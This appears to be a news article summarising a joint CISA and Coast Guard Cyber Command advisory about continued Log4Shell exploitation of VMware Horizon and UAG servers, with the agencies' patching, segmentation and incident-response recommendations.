CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
CISA, along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.
Log4Shell first emerged in December and actively targeted vulnerabilities found in Apache Log4j, open-source software used by numerous companies. The initial vulnerabilities, including subsequent others, allow hackers to access affected systems. The exploits were targeted by not only run-of-the-mill criminal hackers but also state-sponsored hacking groups as well.
Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data.
Log4Shell tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that’s used by a wide range of consumers and enterprise’s services, websites, applications, and other products.
After breaching the networks, they deployed various malware strains providing them with the remote access needed to deploy additional payloads and exfiltrate hundreds of gigabytes of sensitive information.
“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” the agencies noted, adding it also offers a “graphical user interface (GUI) access over a target Windows system’s desktop.”
The alert added that the organizations should always keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be minimized by hosting essential services on a segmented demilitarized zone. Doing so ensures strict network perimeter access controls and not hosting internet-facing services that aren’t essential to business operations.
CISA Suggested organizations that haven’t yet patched their VMware servers are advised to tag them as hacked and start incident response (IR) procedures.
The steps required for proper response in such a situation include the immediate isolation of potentially affected systems, collection, and review of relevant logs and artifacts, hiring third-party IR experts (if needed), and reporting the incident to CISA.
Until you can install patched builds by updating all affected VMware Horizon and UAG servers to the latest versions, you can reduce the attack surface “by hosting essential services on a segregated demilitarized (DMZ) zone,” deploying web application firewalls (WAFs), and “ensuring strict network perimeter access controls.”